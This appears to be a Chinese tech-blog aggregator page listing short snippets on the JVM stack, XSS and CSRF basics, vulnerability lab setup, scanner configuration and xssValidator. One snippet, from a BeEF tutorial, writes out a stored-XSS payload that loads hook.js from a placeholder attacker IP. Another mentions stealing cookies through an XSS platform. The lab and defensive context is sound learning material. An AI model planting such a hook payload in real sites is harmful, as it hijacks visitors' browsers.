虚拟机栈 1、虚拟机栈维护一个线程中所有方法的栈帧,每个栈帧中保存着这个方法中用到的局部变量表,操作数栈,常量引用 2、可以用-Xss来设置每个线程中虚拟机栈的大小,在jdk1.4之前默认虚拟机栈大小是256K,在jdk1.5+默认虚拟机栈大小是1M 3、该区域可能抛出的异常 当线程请求的栈深度超过 ...
分类:
其他好文 时间:
2019-06-15 13:48:31
阅读次数:
76
原文:https://www.cnblogs.com/zhiying/p/11018331.html 前端安全-常见的攻击以及防御 一、基础知识 1、XSS(Cross Site Scripting)跨站脚本攻击 (1)原理:页面渲染的数据中包含可运行的脚本 (2)攻击的基本类型:反射型(url参数 ...
分类:
其他好文 时间:
2019-06-14 12:29:49
阅读次数:
91
漏洞环境搭建 DVWA、XSS、sqli-labs
Acunetix 扫描配置 Full Scan– 使用Full Scan来发起一个扫描的话,Acunetix会检查所有可能得安全漏洞。 High Rish Vulnerabilities–这个扫描选项将仅仅只会检查那些对web站点影响最大的缺陷漏洞。 Cross-Site Scripting(XSS ...
分类:
Web程序 时间:
2019-06-10 09:19:10
阅读次数:
136
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址: h ...
分类:
其他好文 时间:
2019-06-09 00:20:07
阅读次数:
288
Kali中Beef的安装和使用: 先打开终端输入 然后切换到beef的安装目录 然后启动beef ...
分类:
其他好文 时间:
2019-06-07 23:20:24
阅读次数:
255
0X01利用平台payload获取COOKIE 本机IP 192.168.1.100 靶机win7 192.168.1.102 我们先创建一个cookie的项目 然后在可以执行xss的地方插入我们的恶意代码 可以看见成功回显 0X02基础认证钓鱼 ...
分类:
其他好文 时间:
2019-06-06 19:08:12
阅读次数:
97
1.由于Razor Pages自带提供防伪令牌/验证,用来防止跨站点请求伪造(称为XSRF或CSRF),所以和MVC框架中API使用方式有稍许的不同。 2.所以在我们使用Razor Pages中的form表单提交数据时,框架会自动帮我们生成一个隐藏的Input,并在我们提交表单时加入在请求报文头中。 ...
分类:
Web程序 时间:
2019-06-06 16:06:30
阅读次数:
158
跨站请求伪造(Cross-site request forgery)是一种冒充受信任用户,向服务器发送非预期请求的攻击方式。 ...
分类:
其他好文 时间:
2019-06-03 14:18:01
阅读次数:
113
0x01 安装环境 Phantomjs 下载:http://phantomjs.org/download.html 下载后配置环境变量,把bin目录下的这个exe加入环境变量 xssValidator下载安装 https://github.com/nVisium/xssValidator下载xss. ...
分类:
其他好文 时间:
2019-06-01 23:04:32
阅读次数:
477
